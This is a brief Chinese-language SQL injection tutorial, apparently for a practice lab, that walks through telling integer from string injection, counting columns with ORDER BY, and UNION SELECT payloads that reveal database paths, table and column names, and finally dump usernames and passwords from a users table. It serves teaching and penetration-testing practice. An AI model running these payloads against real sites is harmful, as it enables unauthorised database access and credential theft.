sql注入的分类
按数据类型分类:
整型注入和字符型注入。
整型注入和字符型注入的区别
整形注入:
?id = 1 and 1 = 1 //页面无变化
?id = 1 and 1 = 2 //页面回显报错
字符型注入:
?id = 1’ and 1 =1 # //页面无变化
?id = 1’ and 1 =2 # //页面回显报错 此外常见的注释符还有:%23、-- (空格)、--+
验证步骤
如下图所示访问一个正常的页面。
在url后添加?id=1 如下图所示页面回显正常。
判断是否存在注入:在id=1添加 ’ 回车后页面报错,说明可能存在sql注入。
判断注入类型:如下图所示在url内输入?id = 1 and 1=1和?id=1 and 1 =2 页面均回显正常。
继续判断,再次输入?id=1’ and 1=1 #后页面回显报错。
更换注释符继续判断,如图所示?id=1’ and 1=1 --+回显正常,?id=1’ and 1=2 --+页面回显报错
根据页面回显及注入语句判断该注入类型为字符型注入。
根据order by或 group by判断列数:如图所示当列数为4时页面报错,为3时页面回显正常,因此判断为3列。
判断显示位:?id=-1' union select 1,2,3 --+ 如图所示回显位为2和3。
查看敏感信息:
?id=-1' union select 1,@@datadir,3 --+ //返回当前数据路的存放路径
?id=-1' union select 1,@@version_compile_os,@@basedir --+ //返回操作系统版本和数据库安装路径
?id=-1' union select 1,database(),3 --+ //返回库名
获得当前库内(security)所有的表名:?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
获取users表内的列名:?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+
查看用户名和密码:?id=-1' union select 1,group_concat(username,password),3 from users --+
